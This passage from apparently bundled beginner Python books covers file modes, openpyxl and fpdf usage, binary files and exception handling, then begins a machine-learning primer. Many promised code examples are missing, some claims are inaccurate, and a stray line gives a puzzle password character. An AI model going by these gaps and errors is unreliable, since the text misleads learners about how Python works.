The file argument is the fundamental one, since it is the main argument (allowing us to open the file), unlike the rest of the arguments, which are optional and have default values.
Mode: The access mode defines the way in which the file is going to be opened (it could be for reading, writing, or editing).
There are a variety of access modes, these are:
r    This is the default open mode. It opens the file for reading only.
r+   This mode opens the file for both reading and writing.
rb   This mode opens the file for reading only, in binary format.
w    This mode opens the file for writing only. If the file does not exist, this mode creates it.
w+   This is similar to the w mode, but it also allows the file to be read.
wb   This mode is similar to the w mode, but it opens the file in binary format.
wb+  This mode is similar to the wb mode, but it also allows the file to be read.
a    This mode opens a file for appending. Writing starts from the end of the file.
ab   This is similar to mode a, but it opens the file in binary format.
a+   This mode is pretty much like mode a, but it also allows us to read the file.
In summary, there are three main modes, r, w and a, and two
submodes, + and b.
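To make the modes concrete, here is a minimal sketch of open() in use; "sample.txt" is a hypothetical file name used only for illustration:

```python
# Open (and create) the file for writing only ("w"), then close it
f = open("sample.txt", "w")
f.write("hello")
f.close()

# Open it again with no mode given: read-only ("r") by default
f = open("sample.txt")
print(f.read())   # hello
f.close()
```

Note that opening an existing file with "w" truncates it, which is why the write happens before the read.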
In Python, files can be opened as text files or as binary files. It
is very important to specify in which format the file will be opened
to avoid any error in our code.
Read a file:
There are three ways to read a file:
1. read([n])
2. readlines()
3. readline([n])
At this point you may wonder what the letter n enclosed in square
brackets means. It is simple: n is the number of bytes (or characters,
in text mode) that will be read, and the square brackets indicate that
the argument is optional.
The read([n]) method
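A minimal sketch of read() with an argument, assuming a hypothetical sample.txt whose contents we create first:

```python
# Create a small file to work with (hypothetical contents)
with open("sample.txt", "w") as f:
    f.write("goodmorning everyone")

f = open("sample.txt")
print(f.read(9))   # goodmorni: only the first nine characters
f.close()
```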

There we can see that inside read() there is the number 9, which
tells Python to read only the first nine characters of the file.
The readline([n]) method
The readline method reads a single line from the file and returns the
bytes read as a string. It never reads more than one line, even if n
exceeds the length of the line.
Its syntax is very similar to the syntax of the read() method.
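A minimal sketch, again using a hypothetical sample.txt created on the spot:

```python
# A hypothetical two-line file
with open("sample.txt", "w") as f:
    f.write("first line\nsecond line\n")

f = open("sample.txt")
print(repr(f.readline()))     # 'first line\n': reading stops at the newline
print(repr(f.readline(100)))  # even a large n never reads past one line
f.close()
```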

The readlines() method
The readlines method reads all the lines of the file and returns them
as a list of strings. Unlike the readline method, this one is able to
read every line.
Its syntax is very similar to that of read() and readline():
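A sketch with the same hypothetical file:

```python
# A hypothetical two-line file
with open("sample.txt", "w") as f:
    f.write("first line\nsecond line\n")

f = open("sample.txt")
lines = f.readlines()   # every line of the file, as a list of strings
print(lines)            # ['first line\n', 'second line\n']
f.close()
```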

Once we have opened a file, there are several attributes we can
query to learn more about it. These attributes are:
file.name: this attribute returns the name of the file.
file.mode: this attribute returns the access mode with which we
opened the file.
file.closed: this attribute returns True if the file we were working
with is closed, and False if it is still open.
Close() function
The close() method flushes any information still held in the
program's memory buffers and then closes the file. That is not the
only way a file gets closed; it also happens when we reassign a file
object to another file.
The syntax of the close function is as follows:
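A minimal sketch, with a hypothetical file name:

```python
f = open("sample.txt", "w")   # hypothetical file
f.write("some data")
f.close()                     # flush buffered data to disk and close the file
print(f.closed)               # True
```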

What's a buffer?
We can define a buffer as a temporary storage area in RAM; it holds
a fragment of the data that makes up the file being handled by our
operating system. We use buffers very often when we work with a file
whose storage size we do not know.
It is important to keep in mind that if the amount of data held in
memory were to exceed the RAM our machine has, the program will not
be able to run correctly.
What is the size of a buffer for? The buffer size indicates the
storage space available while we use the file. The constant
io.DEFAULT_BUFFER_SIZE tells us the platform's default buffer size.
We can observe this in a clearer way:
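For example:

```python
import io

# The platform's default buffer size, in bytes (commonly 8192,
# but this is platform-dependent)
print(io.DEFAULT_BUFFER_SIZE)
```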
Errors
When opening a file, we can pass an optional string parameter,
errors, which specifies how encoding and decoding errors in our
program should be handled.
The errors parameter can only be used in text mode.
The most common values are:

'ignore'   Ignores characters with a wrong or unknown format
           (malformed data is silently dropped)
'strict'   The default. Raises a subclass of UnicodeError if any
           encoding or decoding failure occurs in our file
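A sketch of both values, using a hypothetical bad.txt that deliberately contains a byte which is not valid UTF-8:

```python
# Write a byte sequence that is not valid UTF-8
with open("bad.txt", "wb") as f:
    f.write(b"caf\xff")

# errors="ignore": the malformed byte is silently dropped
with open("bad.txt", encoding="utf-8", errors="ignore") as f:
    print(f.read())          # caf

# errors="strict" (the default): decoding fails with UnicodeDecodeError
try:
    with open("bad.txt", encoding="utf-8", errors="strict") as f:
        f.read()
except UnicodeDecodeError as e:
    print("decoding failed:", e)
```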
Encoding
The encoding parameter is frequently used when we work with data
storage; it names the character encoding used for the file, that is,
the mapping between characters and the bits and bytes that represent
them.
This is expressed as follows:
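A minimal sketch, with a hypothetical file name and text:

```python
# Store non-ASCII text, explicitly choosing the UTF-8 encoding
with open("sample.txt", "w", encoding="utf-8") as f:
    f.write("ñandú")

with open("sample.txt", "r", encoding="utf-8") as f:
    print(f.read())   # ñandú
```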
Newline
The newline parameter controls how line endings are handled; it can
be None, '' (the empty string), '\n', '\r', or '\r\n'.
Universal newlines are a way of interpreting the line endings found
in the text sequences of our files:
1. The end-of-line sequence in Windows: "\r\n".
2. The end-of-line sequence in classic Mac OS: "\r".
3. The end-of-line sequence in UNIX: "\n".
On input: if newline is None, universal newline mode is activated
automatically. Input lines can end in "\r", "\n" or "\r\n", and these
are translated to "\n" before being returned by our program. If
newline is any of the other legal values, lines are terminated only
by that given string, and the line endings are not translated when
returned.
On output: if newline is None, any "\n" character that has been
written is translated to the system's line separator, os.linesep. If
newline is '' no translation is made, and if newline is any of the
other legal values, every "\n" written is translated to that string.
Example of newline reading for '':

Example of newline reading for None:
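Both cases can be sketched as follows, assuming a hypothetical demo.txt written with Windows-style "\r\n" endings (in binary mode, so nothing is translated on the way in):

```python
with open("demo.txt", "wb") as f:
    f.write(b"line1\r\nline2\r\n")

# newline=None (the default): universal newlines, "\r\n" becomes "\n"
with open("demo.txt", "r", newline=None) as f:
    print(repr(f.read()))   # 'line1\nline2\n'

# newline='' (the empty string): no translation, endings are kept as-is
with open("demo.txt", "r", newline="") as f:
    print(repr(f.read()))   # 'line1\r\nline2\r\n'
```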


Manage files through the "os" module
The "os" module allows us to perform certain operating-system-level
operations, such as starting a process, listing the files in a
folder, or ending a process.
The "os" module offers a variety of methods that let us manage files
and directories:
os.makedirs()            Creates a new directory (and any missing
                         parent directories)
os.path.getsize()        Returns the size of a file in bytes
os.remove(file_name)     Deletes a file
os.getcwd()              Returns the current directory we are
                         working from
os.listdir()             Lists all the contents of a folder
os.rename(current, new)  Renames a file
os.path.isdir()          Returns True if the given path is a
                         directory
os.chdir()               Changes the current working directory
os.path.isfile()         Returns True if the given path is a
                         regular file
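A short sketch of a few of these methods; "demo_dir" is a hypothetical directory name created and removed on the spot:

```python
import os

print(os.getcwd())            # the directory we are currently working in
print(os.listdir("."))        # everything stored in that directory

os.makedirs("demo_dir", exist_ok=True)   # create a directory
print(os.path.isdir("demo_dir"))         # True: it is a directory
print(os.path.isfile("demo_dir"))        # False: it is not a regular file
os.rmdir("demo_dir")                     # clean up
```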

Xlsx files: xlsx files are spreadsheet files, the kind you work with
in programs like Excel. One advantage of this format is that the
resulting files are usually lighter in weight than many other file
types.
Xlsx files are very useful when working with databases, statistics,
calculations, numerical data, graphics and even certain kinds of
basic automation.
In this chapter we are going to learn the basic operations on this
type of file: creating, opening and modifying files.
To start this, first we will have to install the necessary library; we
do this by executing the command "pip3 install openpyxl" in our
Python terminal.
Once this command is executed, it downloads and installs the
openpyxl module for our Python installation; we can also look up its
documentation to get more information about the module.
Create an xlsx file: to create a file with this module, we use the
Workbook class from openpyxl.
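A minimal sketch of these steps; the file and sheet names are hypothetical:

```python
from openpyxl import Workbook   # installed with: pip3 install openpyxl

wb = Workbook()        # the workbook object we are going to work with
ws = wb.active         # activate the default worksheet
ws.title = "Sheet1"    # assign the sheet a name
wb.save("test.xlsx")   # write the workbook to disk
```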
This is the first step in managing xlsx files. First we import the
Workbook class from the openpyxl module; then we assign a Workbook()
object to the variable wb, declaring that this is the document we are
going to work with (we create the object in the form of a worksheet
in this format). Once this is done, we activate the wb object's
worksheet so we can assign it a name, and finally we save the file.
Add information to the file with this module: in order to add
information to our file, we need to use other functions that come
included with the object.
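One way is writing into a specific cell; a minimal sketch, assuming a hypothetical test.xlsx:

```python
from openpyxl import Workbook

wb = Workbook()
ws = wb.active
ws["B4"] = "goodnight"   # write the string directly into cell B4
wb.save("test.xlsx")
```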

We can observe that this is similar to the previous example where we
created a document; we follow the usual steps: inside the function
xlsxdoc() we create the object wb, activate it, and there we add the
information. This time we need to know the specific position we are
going to write to; in this case we write into cell B4 (column B, row
4) and assign it the string "goodnight". The final steps are exactly
the same as in the last example: we give the file a name and save it
with the save command.
There is a simpler way to write and enter data: we can do it through
the append() function.
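A sketch of this approach, with a hypothetical tuple of messages:

```python
from openpyxl import Workbook

wb = Workbook()
ws = wb.active
messages = ("Hello", "goodmorning", "goodnight")
ws.append(messages)    # each item fills the next cell of a new row
wb.save("test.xlsx")
```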

We can observe that we have created the document "test.xlsx" with the
steps explained previously, and that we have created a tuple called
messages with three items:
"Hello", "goodmorning", "goodnight".
Once the tuple is created, we use the append function, which attaches
all the information contained in the tuple messages, and finally we
save the document with the save function.
The append() function only accepts iterable data. What does this
mean? It refers to data such as lists and tuples; if the data is not
passed in this form, our program will raise an error.
Read documents in xlsx
Going back to reading information from xlsx files: for this we import
the load_workbook class. The first thing we need to know is the name
of the file we want to open, and for this we create a variable with
the name.
It is important that the files are located in the same folder as the
program, because otherwise the program will throw an error. Inside
the function xlsdoc() we create the object wb that we are going to
work with; after this, the object "sheet" is created, which
represents the sheet we are going to use.
Once all this is done, we request the information of the specific
boxes "C1", "C2", "C3" through the value attribute and, to validate
that the information we acquire is real, we print everything
requested.
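The steps just described can be sketched as follows; the file name and cell contents are hypothetical, and the file is created first so the example is self-contained:

```python
from openpyxl import Workbook, load_workbook

# First create a small file to read back
wb = Workbook()
ws = wb.active
ws["C1"] = "Hello"
ws["C2"] = "goodmorning"
ws["C3"] = "goodnight"
wb.save("test.xlsx")

# Now open it again and request the value of specific boxes
wb = load_workbook("test.xlsx")
sheet = wb.active
for box in ("C1", "C2", "C3"):
    print(sheet[box].value)
```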
Handling PDF files
The initials of this type of file stand for "Portable Document
Format". PDFs have grown significantly over the years and are mostly
used in business and education. This is because they provide many
benefits, among which security stands out: you can add access keys
to control who can edit the document, and even add a watermark to
prevent plagiarism of information.
Another advantage is that these documents can be viewed from any
device, since no specific program is required; in addition, the
files are much smaller because the text is compressed, unlike Word
documents.
A disadvantage of PDF files is that they are not easy to edit once
they have been created.
In this chapter, we will only learn how to create PDF files.
To create a PDF file, the first thing we have to do is download the
library with the command "pip3 install fpdf"; after this we can
proceed to create our document:

This is a simple example, but at the same time this format is more
laborious than other file types. To start a document you need
several commands: we import the FPDF class from the fpdf library,
then we create the pdfdoc object, which will be the pdf document.
Once the document is created, we have to configure the format, size
and style of the letters we are going to use. To do this we use the
set_font command.
In this case, the type of font that we are going to use is Times New
Roman, with bold style and a size of 12.
After this we add a page through the add_page() command, since we
need a page to write on and fpdf does not create a blank page by
default. Then we insert information with the cell() function, which
takes a set of very important arguments.
The cell function receives the width and the height the cell will
occupy, and the message to be written, in string format. If we want
the borders drawn we must pass 1, since the default is 0 and draws
no border.
The next argument controls where the following cell goes: 0 places
it to the right, and 1 places it on the line below. For the
alignment of the text, a string is passed: "L" for left, "R" for
right, and "C" if you want it centered.
Finally, we will have to save the document through the command
output(), and the arguments that will go with them will be the name
of the file (with the ".pdf" included since we want a file in pdf) and
then a string "F".
Managing BIN files
As we saw earlier, not all files are text files that can be
processed line by line. In certain files, each byte carries a
particular meaning for the program, so they need to be manipulated
in their specific format.
A clear example of this are binary files; to work with this type of
file, it is enough to add a b to the mode parameter.
For example:
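A minimal sketch; "data.bin" is a hypothetical file name:

```python
with open("data.bin", "wb") as f:   # "wb": write in binary format
    f.write(b"hello")

with open("data.bin", "rb") as f:   # "rb": read in binary format
    print(f.read())                 # b'hello'
```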
When we handle a binary file, it is very important to know the
current position in the data in order to modify it. If you don't
know the current position, the file.tell() function returns the
number of bytes that have elapsed since the beginning of the file.
If you want to change the current position in the file, use the
function file.seek(offset, whence), which moves the position to a
given byte offset counted from the point indicated by whence (0 for
the start of the file, 1 for the current position, 2 for the end).
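Both functions can be sketched on a hypothetical six-byte binary file:

```python
with open("data.bin", "wb") as f:
    f.write(b"\x00\x01\x02\x03\x04\x05")

f = open("data.bin", "rb")
print(f.read(3))    # b'\x00\x01\x02'
print(f.tell())     # 3: three bytes have been read so far
f.seek(1, 0)        # jump to byte offset 1, counted from the start (whence=0)
print(f.read(2))    # b'\x01\x02'
f.close()
```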
Exception Handling
What Is Exception Handling
Exception handling is error management. It has three purposes:
1. It allows you to debug your program.
2. It allows your program to continue running despite encountering
an error or exception.
3. It allows you to create your own customized errors that can help
you debug, remove and control some of Python's nuances, and make
your program function as you want it to.
Handling the Zero Division Error Exception
Exception handling can be an easy or difficult task depending on
how you want your program to flow and your creativity. You might
have scratched your head because of the word creativity.
Programming is all about logic, right? No.
The core purpose of programming is to solve problems. A solution
to a problem does not only require logic. It also requires creativity.
Have you ever heard of the phrase, “Think outside of the box?”
Program breaking exceptions can be a pain and they are often
called bugs. The solution to such problems is often elusive. And
you need to find a workaround or risk rewriting your program from
scratch.
For example, you have a calculator program with this snippet of
code when you divide:
>>> def div(dividend, divisor):
        print(dividend / divisor)

>>> div(5, 0)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 2, in div
ZeroDivisionError: division by zero
>>> _
Of course, division by zero is an impossible operation. Because of
that, Python stops the program since it does not know what you
want to do when this is encountered. It does not know any valid
answer or response.
That being said, the problem here is that the error stops your
program entirely. To manage this exception, you have two options.
First, you can make sure to prevent such operation from happening
in your program. Second, you can let the operation and errors
happen, but tell Python to continue your program.
Here is what the first solution looks like:
>>> def div(dividend, divisor):
        if (divisor != 0):
            print(dividend / divisor)
        else:
            print("Cannot Divide by Zero.")

>>> div(5, 0)
Cannot Divide by Zero.
>>> _
Here is what the second solution looks like:
>>> def div(dividend, divisor):
        try:
            print(dividend / divisor)
        except:
            print("Cannot Divide by Zero.")

>>> div(5, 0)
Cannot Divide by Zero.
>>> _
Remember the two core solutions to errors and exceptions. One,
prevent the error from happening. Two, manage the aftermath of
the error.
Congratulations!
The eighth character of the password required to unlock the answer
booklet is the letter t.
Using Try-Except Blocks
In the previous example, a try-except block was used to manage the
error. However, you or your user can still do something to break
this solution. For example:
>>> def div(dividend, divisor):
        try:
            print(dividend / divisor)
        except:
            print("Cannot Divide by Zero.")

>>> div(5, "a")
Cannot Divide by Zero.
>>> _
The statement prepared for the except block does not match the error
that the input actually produced. Dividing a number by a string does
not warrant a "Cannot Divide by Zero." message.
For this to work, you need to know more about how to use except
block properly. First of all, you can specify the error that it will
capture and respond to by indicating the exact exception. For
example:
>>> def div(dividend, divisor):
        try:
            print(dividend / divisor)
        except ZeroDivisionError:
            print("Cannot Divide by Zero.")

>>> div(5, 0)
Cannot Divide by Zero.
>>> div(5, "a")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 3, in div
TypeError: unsupported operand type(s) for /: 'int' and 'str'
>>> _
Now, the error that will be handled has been specified. When the
program encounters the specified error, it will execute the
statements written on the “except” block that captured it. If no
except block is set to capture other errors, Python will then step in,
stop the program, and give you an exception.
But why did that happen? When the example did not specify the
error, it handled everything. That is correct. When the “except”
block does not have any specified error to look out for, it will
capture any error instead. For example:
>>> def div(dividend, divisor):
        try:
            print(dividend / divisor)
        except:
            print("An error happened.")

>>> div(5, 0)
An error happened.
>>> div(5, "a")
An error happened.
>>> _
That is a better way of using the “except” block if you do not know
exactly the error that you might encounter.
Reading an Exception Error Trace Back
The most important part in error handling is to know how to read
the trace back message. It is fairly easy to do. The trace back
message is structured like this:
<Traceback Stack Header>
<File Name>, <Line Number>, <Function/Module>
<Exception>: <Exception Description>
Here are things you need to remember:
- The traceback stack header informs you that an error occurred.
- The file name tells you the name of the file where the fault is
located. Since the examples in the book are coded using the
interpreter, it always indicates that the file name is "<stdin>" or
standard input.
- The line number tells the exact line number in the file that
caused the error. Since the examples are tested in the interpreter,
it will always say line 1. However, if the error is found in a code
block or module it will return the line number of the statement
relative to that code block or module.
- The function/module part tells what function or module owns the
statement. If the code block does not have an identifier or the
statement is declared outside code blocks, it will default to
<module>.
- The exception tells you what kind of error happened. Some of them
are built-in classes (e.g., ZeroDivisionError, TypeError, etcetera)
while some are just errors (e.g., SyntaxError). You can use them in
your except blocks.
- The exception description gives you more details with regards to
how the error occurred. The description format may vary from error
to error.

Using exceptions to prevent crashes


Anyway, to know the exceptions that you can use, all you need to
do is to generate the error. For example, using the TypeError found
in the previous example, you can capture that error too and provide
the correct statements in response.
>>> def div(dividend, divisor):
        try:
            print(dividend / divisor)
        except ZeroDivisionError:
            print("Cannot Divide by Zero.")
        except TypeError:
            print("Cannot Divide by Anything Other Than a Number.")
        except:
            print("An unknown error has been detected.")

>>> div(5, 0)
Cannot Divide by Zero.
>>> div(5, "a")
Cannot Divide by Anything Other Than a Number.
>>> div(10 ** 1000, 1)
An unknown error has been detected.
>>> _
However, catching errors this way can still be problematic. It does
allow you to prevent a crash or stop, but you have no idea about
what exactly happened. To know the unknown error, you can use
the as keyword to pass the Exception details to a variable.
Convention wise, the variable detail is often used for this purpose.
For example:
>>> def div(dividend, divisor):
        try:
            print(dividend / divisor)
        except Exception as detail:
            print("An error has been detected.")
            print(detail)
            print("Continuing with the program.")

>>> div(5, 0)
An error has been detected.
division by zero
Continuing with the program.
>>> div(5, "a")
An error has been detected.
unsupported operand type(s) for /: 'int' and 'str'
Continuing with the program.
>>> _
The Else Block
There are times that an error happens in the middle of your code
block. You can catch that error with try and except. However, you
might not want to execute any statement in that code block if an
error happens. For example:
>>> def div(dividend, divisor):
        try:
            quotient = dividend / divisor
        except Exception as detail:
            print("An error has been detected.")
            print(detail)
            print("Continuing with the program.")
        print(str(dividend) + " divided by " + str(divisor) + " is:")
        print(quotient)

>>> div(4, 2)
4 divided by 2 is:
2.0
>>> div(5, 0)
An error has been detected.
division by zero
Continuing with the program.
5 divided by 0 is:
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 9, in div
    print(quotient)
UnboundLocalError: local variable 'quotient' referenced before
assignment
>>> _
As you can see, the next statements after the initial fault are
dependent on it thus they are also affected. In this example, the
variable quotient returned an error when used after the try and
except block since its supposed value was not assigned because the
expression assigned to it was impossible to evaluate.
In this case, you would want to drop the remaining statements that
are dependent on the contents of the try clause. To do that, you
must use the else block. For example:
>>> def div(dividend, divisor):
        try:
            quotient = dividend / divisor
        except Exception as detail:
            print("An error has been detected.")
            print(detail)
            print("Continuing with the program.")
        else:
            print(str(dividend) + " divided by " + str(divisor) + " is:")
            print(quotient)

>>> div(4, 2)
4 divided by 2 is:
2.0
>>> div(5, 0)
An error has been detected.
division by zero
Continuing with the program.
>>> _
The first attempt on using the function with proper arguments went
well.
On the second attempt, the program did not execute the last two
statements under the else block because it returned an error.
The else block always follows the except blocks. Its function is to
let Python execute the statements under it when the try block did
not raise an exception, and to skip them if one did.
Failing Silently
Silent fails or failing silently is a programming term often used
during error and exception handling.
In a user’s perspective, silent failure is a state wherein a program
fails at a certain point but never informs a user.
In a programmer’s perspective, silent failure is a state wherein the
parser, runtime development environment, or compiler fails to
produce an error or exception and proceed with the program. This
often leads to unintended results.
A programmer can also induce silent failures when he either
ignores exceptions or bypasses them. Alternatively, he blatantly
hides them and creates workarounds to make the program operate
as expected even if an error happened. He might do that because of
multiple reasons such as the error is not program breaking or the
user does not need to know about the error.
Handling the File Not Found Exception Error
There will be times when you will encounter the
FileNotFoundError. Handling such error depends on your intent or
purpose with regards to opening the file. Here are common reasons
you will encounter this error:
- You did not pass the directory and filename as a string.
- You misspelled the directory or filename.
- You did not specify the directory.
- You did not include the correct file extension.
- The file does not exist.
The first method to handle the FileNotFoundError exception is to
make sure that all the common reasons do not cause it. Once you
do, then you will need to choose the best way to handle the error,
which is completely dependent on the reason you are opening a file
in the first place.
Checking If File Exists
Again, there are always two ways to handle an exception:
preventive and reactive. The preventive method is to check if the
file exists in the first place.
To do that, you will need to use the os (os.py) module that comes
with your Python installation. Then, you can use its path module’s
isfile() function. The path module’s file name depends on the
operating system (posixpath for UNIX, ntpath for Windows,
macpath for old MacOS). For example:
>>> from os import path
>>> path.isfile("random.txt")
False
>>> path.isfile("sampleFile.txt")
True
>>> _
Try and Except
You can also do it the hard way by using try, except, and else
blocks.
>>> def openFile(filename):
        try:
            x = open(filename, "r")
        except FileNotFoundError:
            print("The file '" + filename + "' does not exist.")
        else:
            print("The file '" + filename + "' does exist.")

>>> openFile("random.txt")
The file 'random.txt' does not exist.
>>> openFile("sampleFile.txt")
The file 'sampleFile.txt' does exist.
>>> _
Creating a New File
If the file does not exist, and your goal is to overwrite any existing
file anyway, then it will be best for you to use the "w" or "w+"
access mode. The access mode creates a new file for you if it does
not exist. For example:
>>> x = open("new.txt", "w")
>>> x.tell()
0
>>> _
If you are going to read and write, use "w+" access mode instead.
Practice Exercise
Try to break your Python by discovering at least ten different
exceptions.
After that, create a loop.
In the loop, create ten statements that will create each of the ten
different exceptions that you find inside one try block.
Each time the loop loops, the next statement after the one that
triggered an exception should trigger another and so on.
Provide a specific except block for each one of the errors.
Summary
Exception handling skills are a must learn for beginners. It teaches
you how to predict, prevent, and manage exceptions. It allows you
to test and debug your program and generate compromises with
your skill, program, and system’s limits.
That being said, you have made great strides to get this far and I
commend you!
Tips and Tricks for Success
We’ve reached the end of this book. You’ve been introduced to
Python’s main topics and written some programs. What’s next?
How do you keep improving and mastering the Python language?
Here are some tips for success that keep you on the right path:
Code every day
Practice makes perfect. When learning a new language like
Chinese or Spanish, experts recommend you use it every day in the
form of speaking and going through an exercise or so. It’s no
different with a programming language. The more you practice, the
more the basic syntax will become second nature to you, and you’ll
instinctively know when to use concepts like conditionals and
loops. There are lots of resources (which you find in the appendix)
that provide exercises and sample programs you can work on right
away.
Write by hand
When you’re taking notes (and you should take notes), write them
out by hand. Studies show that the process of taking physical pen to
physical paper facilitates the best long-term memory retention.
Writing by hand includes writing code by hand, and then checking
it on your computer, so you know for sure if it’s accurate.
Outlining code and ideas this way can help you stay organized, as
well, before starting to actually build a program.
Find other beginners
Learning to code by yourself can get boring and frustrating. One of
the best ways to learn and improve is to find others who are in the
same phase as you. You can bounce ideas off each other, help out
on projects, and more. If you don’t know anyone in your immediate
circle, you can check out groups online and/or find local events
through Meetups and Facebook. Always exercise caution and
employ safe practices when first meeting people you only know
online. Stick to public places during daylight hours, and don’t go
anywhere alone with someone you don’t know well until you feel
comfortable.
Try explaining Python out loud
Sometimes explaining something you just learned to someone is
the best way to really cement it into your mind. It allows you to
reframe concepts into your own words. You don’t even have to talk
to a real person; it can be an inanimate object. This is such a
common practice among programmers that it’s known as “rubber
duck debugging,” which references talking to a rubber duck about
bugs in a program. Pick a topic in Python like conditionals or
variables, and see if you can explain it. If you have trouble or
realize there’s a gap in your knowledge, it’s time to go back and
keep learning.
Check out other languages
This book is about Python, so obviously we believe that should be
your priority, but getting to know a little bit about other languages
can be very helpful, too. It will definitely make you a better
programmer in the future. Checking out other languages can help
you discover what common architecture is built into every
language as well as the differences between them and Python. Even
if you just read about other languages and never write much code
in anything besides Python, you’ll be improving your knowledge
and skill.
Have a plan for when you get stuck
When you get stuck while coding, take a step back. What are you
trying to get the code to do? What have you tried? And what’s
happening? Write the answers down and be as specific and detailed
as possible. Then, you can go to someone else for help, and you
won’t have to spend a ton of time trying to explain the problem.
The answers are also really useful just for your own thought
process. Take a close look at any error messages you’re getting.
Work your way backward to try and spot any mistakes.
Another response to getting stuck is to just start over. If your code
is really long, it can be discouraging to start from scratch, but that
means you don’t have to go through the whole thing, picking it
apart and wearing out your eyes. Starting over may actually be
easier.
Take a break
Whether you choose to begin again or go through the code with a
fine-toothed comb, you should take breaks. When you work on a
problem for too long, your brain gets stuck in a groove, and it’s
difficult to come up with new solutions. Go do something that
doesn’t use the exact same muscles as coding. Exercise your body
instead, take a long shower, lie down for a nap, or bake some
cookies. Einstein would often come up with solutions to his
problems while he played the violin, and who doesn’t want to think
a little bit like Einstein?
Conclusion
Learning how to get started with computer programming may seem
like a large challenge. You can go with many distinct programming
alternatives, but many of them are difficult to learn, will take some
time to figure out, and will not always do all the things you need.
Many people are afraid they need to be smart or have a lot of
education and coding experience before they can make it to the
level of coding they want. But, even a beginner may get into
programming with Python.
Whether you're a beginner or have been in this field for some time,
Python has made it so easy to code. The language is English-based,
so it's simple to read, and it's got rid of many of the other symbols
that make coding difficult to read. And since it is open source, anyone can
make changes, share their code, and learn from what others have written,
which makes things easier still.
Keep in mind that, if you have any questions that may not have
been answered in this book, you can always visit the Python
website! The Python website contains a lot of material that will
help you work with Python and ensure that you are entering your
code properly. You can also find any updates that you may need for
your Python program in the event that your program is not updating
properly or you need another version of it.
You can work with the program and teach it what you want it to do,
and you may even be able to help someone else out if they are not
able to get the program to do what they want it to do!
Just remember that you do not need to worry if your Python code
doesn’t work the first time because using Python takes a lot of
practice. The more you practice, the better your code will look, and
the better it will be executed. Not only that, but you will get to see
Machine Learning in action each time you enter your code!
PYTHON MACHINE LEARNING:
THE ABSOLUTE BEGINNER’S
GUIDE TO UNDERSTANDING
NEURAL NETWORKS,
ARTIFICIAL INTELLIGENCE,
DEEP LEARNING AND
MASTERING THE
FUNDAMENTALS OF ML WITH
PYTHON.
JOHN S. CODE
Table of Contents
Introduction
Chapter 1 What is Machine Learning
Chapter 2 Applications of Machine Learning
Chapter 3 Big Data and Machine Learning
Chapter 4 Types Of Machine Learning
Chapter 5 How Does Machine Learning Compare to AI
Chapter 6 Hands on with Python
Chapter 7 What Is Python, and How Do I Use It?
Chapter 8 Machine Learning Algorithms
Chapter 9 Essential Libraries for Machine Learning in Python
Chapter 10 Artificial Neural Networks
Chapter 11 Data Science
Chapter 12 A Quick Look At Deep Learning
Conclusion
Introduction
The mention of developers and programming usually has a lot of people
directing their thoughts to the wider study of computer science. Computer
science is a wide area of study. In machine learning, computers learn from
experience, aided by algorithms. To aid their cause, they must use data with
specific features and attributes. This is how they identify patterns that we can
use to help in making important decisions. In machine learning, assignments
are grouped under different categories, such as predictive modeling and
clustering models. The concept behind machine learning is to provide
solutions to pertinent problems without necessarily waiting for direct human
interaction.
Human beings are known to learn from their experiences. Consider a
situation in which you are learning to read or speak a new language. You will
show an improvement with time. Machine learning was borrowed from the
concept of learning exhibited by human beings. When computer systems are
exposed to the same situation repeatedly, they can show an improvement in
the way they respond to that situation with time. Machine learning typically
relies on data. It involves the design and development of computer systems
that can extract patterns, trends, and relationships between various variables
in a dataset. Such knowledge can then be used to predict what will happen in
the future.
Enjoy reading!
Chapter 1 What is Machine Learning
The first topic that we need to take a look at in this guidebook is machine
learning. This is basically a process where you are trying to teach a computer
or another machine how to use its own experiences with a particular user, and
some of the things it has seen in the past, to help it perform even better in the
future. There are a lot of examples of how this can work, such as voice
recognition devices, and even with search engines.
As we go through this guidebook, you will find that there are a lot of
different methods and algorithms that you can use with machine learning in
order to get the machine to learn, but the one you choose really depends on
the kind of results you want to get and the project that you decide to work
with.
Machine learning is going to be a method of data analysis that is able to
automate the process of building analytical models. It is also a branch of
artificial intelligence that is going to be based on the whole idea that a system
is able to learn from the data it is presented, it can identify the patterns that
are there, and it is even able to make its own decisions without a lot of
intervention from humans in the process.
Because of all the new computing technologies that are out there, machine
learning as we know it today is not really the same as the machine learning
of the past. It was born out of pattern recognition and the idea that a
computer is able to learn to perform a task without a programmer explicitly
telling it how. Researchers who were interested in artificial intelligence
wanted to see whether their machines were able to learn from the data they
were fed.
The iterative aspect of machine learning is important because, as we expose
the models we create to new data, they are able to adapt on their own,
independently. The machine is able to learn from what has happened in the
past, and the examples it was given, in order to make accurate and reliable
predictions in the future.
In recent years, there has been a resurgence of interest in machine learning
thanks to a few different factors. In particular, techniques like Bayesian
analysis and data mining are growing in popularity, and in the process,
machine learning is being used more now than ever before.
All of these things mean that it is now easier and faster to automatically
produce models with machine learning. These models are able to analyze
bigger and more complex data while delivering faster and more accurate
results, even on a very large scale. And because all of this comes together to
build models that are more precise, an organization sets itself up to identify
profitable opportunities better than before, while also avoiding more of those
unknown risks ahead of time. This all comes together to help a company
become more competitive in the market.
There are a few things that need to come together in order to make sure that
the system you use in machine learning is actually good. Some of these will
include:
1. Ensemble modeling
2. Scalability
3. Iterative and automation processes
4. Algorithms, a good combination of basic and advanced ones
5. Data preparation capabilities.
The neat thing about working with machine learning is that almost every
industry is able to use it. And it is still relatively new in the world of
technology, so even the amazing things that have been done with it so far are
just the beginning; it is believed that this kind of technology will be able to
do even more as it matures.
Machine learning is likely to grow quite a bit as time goes on. Right now, a
lot of companies are using it to figure out what the data they are receiving is
telling them, to make better business decisions over time rather than having
to make those decisions on their own, and to find patterns hidden in the data
that a human would never be able to go through.
But this is just the start of what we are able to do when it comes to machine
learning. There are a ton of other applications, and what we are able to do
with this right now is just the beginning. As more people and developers start
to work with machine learning and start to add in some of the Python
languages with it, it is likely that more and more applications are going to be
available as well.
Most of the industries out there that are already working with large amounts
of data recognize the kind of value that they can get from the technology that
comes with machine learning. By being able to actually get through this data
and glean some good insights from it, close to real time, a company is able to
work in a more efficient manner and gain a big advantage over others in the
same industry.
And this is the beauty of working with machine learning. Things that may
have seemed impossible in the past are possible now with its help.
Businesses that are handling more data than ever before are finding the value
of working with machine learning to help them get their work done. They
can get through this information faster than would be possible with a person
looking through it on their own, and it can give them that competitive edge
over others.
There are a lot of different companies that will be able to benefit from a
